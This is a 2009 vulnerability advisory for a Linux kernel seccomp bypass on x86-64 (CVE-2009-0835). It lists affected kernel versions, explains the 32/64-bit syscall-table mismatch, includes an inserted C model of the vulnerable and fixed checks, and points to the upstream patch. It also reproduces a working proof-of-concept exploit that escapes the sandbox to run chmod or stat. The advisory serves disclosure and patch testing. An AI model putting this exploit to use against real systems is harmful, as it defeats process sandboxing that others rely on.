Written by Chris Evans   
Friday, 13 March 2009 23:59
Linux Kernel 'seccomp' System Call Security Bypass Vulnerability


-\\Bugtraq ID:
33948

-\\Class:
Design Error

-\\CVE:
CVE-2009-0835


-\\Remote:
No

-\\Local:
Yes

-\\Published:
Mar 02 2009 12:00AM

-\\Updated:
Mar 13 2009 05:16PM

-\\Credit:
Chris Evans



-\\Vulnerable:
Linux kernel 2.6.28 6
Linux kernel 2.6.28 5
Linux kernel 2.6.28 3
Linux kernel 2.6.28 2
Linux kernel 2.6.28 1
Linux kernel 2.6.28 -rc7
Linux kernel 2.6.28 -rc5
Linux kernel 2.6.28 -rc1
Linux kernel 2.6.28 -git7
Linux kernel 2.6.28
Linux kernel 2.6.27 6
Linux kernel 2.6.27 3
Linux kernel 2.6.27 14
Linux kernel 2.6.27 13
Linux kernel 2.6.27 12
Linux kernel 2.6.27 .8
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 -rc8-git5
Linux kernel 2.6.27 -rc8
Linux kernel 2.6.27 -rc6-git6
Linux kernel 2.6.27 -rc6
Linux kernel 2.6.27 -rc5
Linux kernel 2.6.27 -rc2
Linux kernel 2.6.27 -rc1
Linux kernel 2.6.27
Linux kernel 2.6.26 7
Linux kernel 2.6.26 4
Linux kernel 2.6.26 3
Linux kernel 2.6.26 .6
Linux kernel 2.6.26 -rc6
Linux kernel 2.6.26
Linux kernel 2.6.25 19
Linux kernel 2.6.25 .9
Linux kernel 2.6.25 .8
Linux kernel 2.6.25 .7
Linux kernel 2.6.25 .6
Linux kernel 2.6.25 .5
Linux kernel 2.6.25 .15
Linux kernel 2.6.25 .13
Linux kernel 2.6.25 .12
Linux kernel 2.6.25 .11
Linux kernel 2.6.25 .10
Linux kernel 2.6.25
Linux kernel 2.6.24 .2
Linux kernel 2.6.24 .1
Linux kernel 2.6.24 -rc5
Linux kernel 2.6.24 -rc4
Linux kernel 2.6.24 -rc3
Linux kernel 2.6.24 -git13
Linux kernel 2.6.24
Linux kernel 2.6.23 .7
Linux kernel 2.6.23 .6
Linux kernel 2.6.23 .5
Linux kernel 2.6.23 .4
Linux kernel 2.6.23 .3
Linux kernel 2.6.23 .2
Linux kernel 2.6.23 -rc2
Linux kernel 2.6.23 -rc1
Linux kernel 2.6.23
Linux kernel 2.6.22 7
Linux kernel 2.6.22 1
Linux kernel 2.6.22 .8
Linux kernel 2.6.22 .6
Linux kernel 2.6.22 .5
Linux kernel 2.6.22 .4
Linux kernel 2.6.22 .3
Linux kernel 2.6.22 .17
Linux kernel 2.6.22 .16
Linux kernel 2.6.22 .15
Linux kernel 2.6.22 .14
Linux kernel 2.6.22 .13
Linux kernel 2.6.22 .12
Linux kernel 2.6.22 .11
Linux kernel 2.6.22
Linux kernel 2.6.21 4
Linux kernel 2.6.21 .7
Linux kernel 2.6.21 .6
Linux kernel 2.6.21 .2
Linux kernel 2.6.21 .1
Linux kernel 2.6.21
Linux kernel 2.6.20 .9
Linux kernel 2.6.20 .8
Linux kernel 2.6.20 .5
Linux kernel 2.6.20 .4
Linux kernel 2.6.20 .15
Linux kernel 2.6.20 -git5
Linux kernel 2.6.20
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.20
Linux kernel 2.6.19 1
Linux kernel 2.6.19 .2
Linux kernel 2.6.19 .1
Linux kernel 2.6.19 -rc4
Linux kernel 2.6.19 -rc3
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc2
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.19 -rc1
Linux kernel 2.6.19
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.18 .4
Linux kernel 2.6.18 .3
Linux kernel 2.6.18 .1
Linux kernel 2.6.18
Linux kernel 2.6.17 .8
Linux kernel 2.6.17 .7
Linux kernel 2.6.17 .6
Linux kernel 2.6.17 .5
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .2
Linux kernel 2.6.17 .14
Linux kernel 2.6.17 .13
Linux kernel 2.6.17 .12
Linux kernel 2.6.17 .11
Linux kernel 2.6.17 .10
Linux kernel 2.6.17 .1
Linux kernel 2.6.17 -rc5
Linux kernel 2.6.17
Linux kernel 2.6.16 27
Linux kernel 2.6.16 13
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .23
Linux kernel 2.6.16 .19
Linux kernel 2.6.16 .12
Linux kernel 2.6.16 .11
Linux kernel 2.6.16 .1
Linux kernel 2.6.16 -rc1
Linux kernel 2.6.16
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15 -rc3
Linux kernel 2.6.15 -rc2
Linux kernel 2.6.15 -rc1
Linux kernel 2.6.15
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14 -rc4
Linux kernel 2.6.14 -rc3
Linux kernel 2.6.14 -rc2
Linux kernel 2.6.14 -rc1
Linux kernel 2.6.14
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13 -rc7
Linux kernel 2.6.13 -rc6
Linux kernel 2.6.13 -rc4
Linux kernel 2.6.13 -rc1
Linux kernel 2.6.13
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .22
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .12
Linux kernel 2.6.12 .1
Linux kernel 2.6.12 -rc5
Linux kernel 2.6.12 -rc4
Linux kernel 2.6.12 -rc1
Linux kernel 2.6.12
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .4
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel  2.6.8.1
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel  2.6.29-rc2-git1
Linux kernel  2.6.29-rc2
Linux kernel  2.6.28.4
Linux kernel  2.6.26.1
Linux kernel  2.6.26-rc5-git1
Linux kernel  2.6.25.4
Linux kernel  2.6.25.3
Linux kernel  2.6.25.2
Linux kernel  2.6.25.1
Linux kernel  2.6.24.6
Linux kernel  2.6.24-rc2
Linux kernel  2.6.24-rc1
Linux kernel  2.6.23.14
Linux kernel  2.6.23.10
Linux kernel  2.6.23.1
Linux kernel  2.6.23.09
Linux kernel  2.6.22-rc7
Linux kernel  2.6.22-rc1
Linux kernel  2.6.21-RC6
Linux kernel  2.6.21-RC5
Linux kernel  2.6.21-RC4
Linux kernel  2.6.21-RC3
Linux kernel  2.6.20.3
Linux kernel  2.6.20.2
Linux kernel  2.6.20.13
Linux kernel  2.6.20.11
Linux kernel  2.6.20.1
Linux kernel  2.6.20-rc2
Linux kernel  2.6.20-2
Linux kernel  2.6.18-8.1.8.el5
Linux kernel  2.6.18-53
Linux kernel  2.6.18
Linux kernel  2.6.15.5
Linux kernel  2.6.15.11
Linux kernel  2.6.15-27.48
Linux kernel  2.6.11.4



-\\Discussion
The Linux kernel is prone to a local security-bypass vulnerability in the x86-64 implementation of the seccomp facility (prctl(PR_SET_SECCOMP, 1), "mode 1", which is meant to confine a process to read, write, exit and sigreturn). The allow-list is selected from the task's nominal ABI (32- or 64-bit), but the system call table the kernel dispatches on is selected by the entry instruction: int $0x80 always uses the 32-bit table and syscall always uses the 64-bit one. A 64-bit process issuing int $0x80, or a 32-bit process far-jumping into a 64-bit code segment and issuing syscall, therefore has its syscall number checked against one table and executed from the other; number 15, for example, is rt_sigreturn in the 64-bit table but chmod in the 32-bit table.

A local attacker who controls code inside a seccomp-confined process may exploit this issue to make system calls the sandbox was meant to forbid (the proof of concept below performs chmod(".", 0777) from a 64-bit process and stat(".") from a 32-bit one), which, depending on what the sandboxed process can reach, may result in an elevation of privileges.
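To make the table mix-up concrete, the following is an added model of the two checks in C. It is not kernel code and is not part of the original advisory: the syscall tables are reduced to the handful of real x86 numbers involved, `seccomp_mode1_vulnerable` and `seccomp_mode1_fixed` are hypothetical names standing in for the pre- and post-fix decision logic, and `dispatched` models which table the entry instruction selects.

```c
#include <stdio.h>
#include <string.h>

/* Which entry instruction the user process used.  On x86-64 this, not the
 * task's ABI flag, decides which table the kernel dispatches on:
 * int $0x80 always takes the 32-bit table, syscall always the 64-bit one. */
enum entry_path { ENTRY_SYSCALL, ENTRY_INT80 };

struct sc { int nr; const char *name; };

/* Reduced syscall tables: real x86 numbers, but only the ones this
 * example needs (constructed subset, not the full tables). */
static const struct sc table_64[] = {
    { 0, "read" }, { 1, "write" }, { 4, "stat" }, { 15, "rt_sigreturn" },
    { 60, "exit" }, { 90, "chmod" },
};
static const struct sc table_32[] = {
    { 1, "exit" }, { 3, "read" }, { 4, "write" }, { 15, "chmod" },
    { 106, "stat" }, { 119, "sigreturn" }, { 173, "rt_sigreturn" },
};

/* seccomp mode 1 allow-lists: read, write, exit, sigreturn, per table.
 * Terminated by -1. */
static const int mode1_allowed_64[] = { 0, 1, 60, 15, -1 };
static const int mode1_allowed_32[] = { 3, 4, 1, 119, 173, -1 };

static int in_list(const int *list, int nr)
{
    for (; *list != -1; list++)
        if (*list == nr)
            return 1;
    return 0;
}

static const char *lookup(const struct sc *t, size_t n, int nr)
{
    for (size_t i = 0; i < n; i++)
        if (t[i].nr == nr)
            return t[i].name;
    return "unknown";
}

/* What the kernel actually runs for (entry path, number). */
const char *dispatched(enum entry_path e, int nr)
{
    return e == ENTRY_INT80
        ? lookup(table_32, sizeof table_32 / sizeof *table_32, nr)
        : lookup(table_64, sizeof table_64 / sizeof *table_64, nr);
}

/* Pre-fix logic (hypothetical name): the allow-list follows the task's
 * nominal ABI and ignores the entry path. */
int seccomp_mode1_vulnerable(int task_is_ia32, enum entry_path e, int nr)
{
    (void) e;
    return task_is_ia32 ? in_list(mode1_allowed_32, nr)
                        : in_list(mode1_allowed_64, nr);
}

/* Post-fix logic (hypothetical name): the allow-list follows the entry
 * path, i.e. the same table the number is about to be dispatched on. */
int seccomp_mode1_fixed(int task_is_ia32, enum entry_path e, int nr)
{
    (void) task_is_ia32;
    return e == ENTRY_INT80 ? in_list(mode1_allowed_32, nr)
                            : in_list(mode1_allowed_64, nr);
}

/* Name of the syscall a task confined by the vulnerable check gets to run,
 * or NULL if the check would have killed it. */
const char *bypass(int task_is_ia32, enum entry_path e, int nr)
{
    return seccomp_mode1_vulnerable(task_is_ia32, e, nr) ? dispatched(e, nr) : NULL;
}

int main(void)
{
    struct { const char *what; int ia32; enum entry_path e; int nr; } cases[] = {
        { "64-bit task, int $0x80, nr 15", 0, ENTRY_INT80,   15 },
        { "32-bit task, syscall,   nr 4",  1, ENTRY_SYSCALL,  4 },
        { "64-bit task, syscall,   nr 90", 0, ENTRY_SYSCALL, 90 },
    };
    for (size_t i = 0; i < sizeof cases / sizeof *cases; i++) {
        const char *ran = bypass(cases[i].ia32, cases[i].e, cases[i].nr);
        printf("%-32s vulnerable: %-14s fixed: %s\n", cases[i].what,
               ran ? ran : "SIGKILL",
               seccomp_mode1_fixed(cases[i].ia32, cases[i].e, cases[i].nr)
                   ? dispatched(cases[i].e, cases[i].nr) : "SIGKILL");
    }
    return 0;
}
```

The first two cases are exactly the two failure modes of the proof of concept below: the vulnerable check accepts 15 as rt_sigreturn and 4 as write, while the entry path runs chmod and stat. The third case shows that asking for chmod by its own 64-bit number is killed either way, which is why the bug needs the cross-ABI entry and is not a general allow-list failure.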



-\\Exploit(s)/PoC(s):
The following example exploit is available:

===============================================================
33948.c
^^^^^^^^
    /* test case for seccomp circumvention on x86-64
       There are two failure modes: compile with -m64 or compile with -m32.

       The -m64 case is the worst one, because it does "chmod 777 ." (could
       be any chmod call).  The -m32 case demonstrates it was able to do
       stat(), which can glean information but not harm anything directly.

       A buggy kernel will let the test do something, print, and exit 1; a
       fixed kernel will make it exit with SIGKILL before it does anything.

       Why it works: seccomp mode 1 permits only read, write, exit and
       sigreturn, but the buggy kernel checks the syscall number against
       the allow-list of the task's nominal ABI, while the entry instruction
       decides which table is really dispatched on (int $0x80 -> 32-bit
       table, syscall -> 64-bit table).  Number 15 is rt_sigreturn in the
       64-bit table but chmod in the 32-bit one; number 4 is write in the
       32-bit table but stat in the 64-bit one.

       Build without PIE (gcc -no-pie on toolchains that default to PIE):
       the -m64 path passes the pointer in a 32-bit register, so `dot` has
       to live below 4 GiB, which the assert() checks.
    */

    #define _GNU_SOURCE
    #include <assert.h>
    #include <inttypes.h>
    #include <stdio.h>
    #include <sys/prctl.h>      /* prctl() prototype and PR_SET_SECCOMP */
    #include <sys/stat.h>
    #include <unistd.h>
    #include <asm/unistd.h>

    int
    main (int argc, char **argv)
    {
      char buf[100];
      static const char dot[] = ".";
      long ret;
      unsigned st[24];           /* large enough for a 64-bit struct stat */
      (void) argc; (void) argv;

      /* Enter seccomp mode 1; from here on only read/write/exit/sigreturn
         should be reachable. */
      if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
        perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
    #ifdef __x86_64__
      assert ((uintptr_t) dot < (1UL << 32));
      /* 64-bit task, 32-bit entry path: eax=15 passes the check as
         rt_sigreturn, but int $0x80 runs 32-bit syscall 15 =
         chmod(ebx=path, ecx=mode). */
      asm ("int $0x80 # %0 <- %1(%2 %3)"
           : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      ret = snprintf (buf, sizeof buf,
              "result %ld (check mode on .!)\n", ret);
    #elif defined __i386__
      /* 32-bit task, 64-bit entry path: far-jump to the 64-bit user code
         segment (selector 0x33), issue syscall with eax=4, which the check
         accepts as 32-bit write but the kernel runs as 64-bit syscall 4 =
         stat(rdi=path, rsi=buf), then lret back into 32-bit code. */
      asm (".code32\n"
           "pushl %%cs\n"
           "pushl $2f\n"
           "ljmpl $0x33, $1f\n"
           ".code64\n"
           "1: syscall # %0 <- %1(%2 %3)\n"
           "lretl\n"
           ".code32\n"
           "2:"
           : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      if (ret == 0)
        /* st[7] is st_uid of the 64-bit struct stat (after st_dev, st_ino,
           st_nlink and st_mode) when read as 32-bit words. */
        ret = snprintf (buf, sizeof buf,
                "stat . -> st_uid=%u\n", st[7]);
      else
        ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
    #else
    # error "not this one"
    #endif
      write (1, buf, ret);

      /* exit (not exit_group) is on the mode-1 allow-list. */
      syscall (__NR_exit, 1);
      return 2;
    }




-\\Solution
The upstream fix is Roland McGrath's patch "[PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole" (see References): it makes seccomp select the allow-list by the entry path actually taken rather than by the task's nominal ABI, so the syscall number is checked against the same table it is dispatched on. Run a kernel carrying that patch, or a vendor kernel update that includes it; we are not aware of other vendor-supplied fixes. To check a running kernel, build the test case above with -m64 and with -m32 and run both: a fixed kernel kills each with SIGKILL before it prints anything, a vulnerable kernel prints a result and exits 1. If you feel we are in error or if you are aware of more recent information, please contact us by e-mail.



-\\References(s)
--Bug 487255 -  kernel: x86-64: seccomp: 32/64 syscall hole  
https://bugzilla.redhat.com/show_bug.cgi?id=487255  (Eugene Teo)
--[PATCH 0/2] x86-64: 32/64 syscall arch holes
http://lkml.org/lkml/2009/2/27/45  (Roland McGrath)
--[PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
http://lkml.org/lkml/2009/2/27/45  (Roland McGrath)
--CESA-2009-001 - rev 1: Linux syscall interception technologies partial bypass
http://scary.beasts.org/security/CESA-2009-001.htm  (Chris Evans)
--CESA-2009-004 - rev 1: Linux kernel 'seccomp' facility minor vulnerability
http://scary.beasts.org/security/CESA-2009-004.htm  (Chris Evans)
--Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
http://lkml.org/lkml/2009/2/28/2  (Roland McGrath)
--Problems with syscall filtering technologies on Linux
http://www.securityfocus.com/archive/1/50037  (Chris Evans)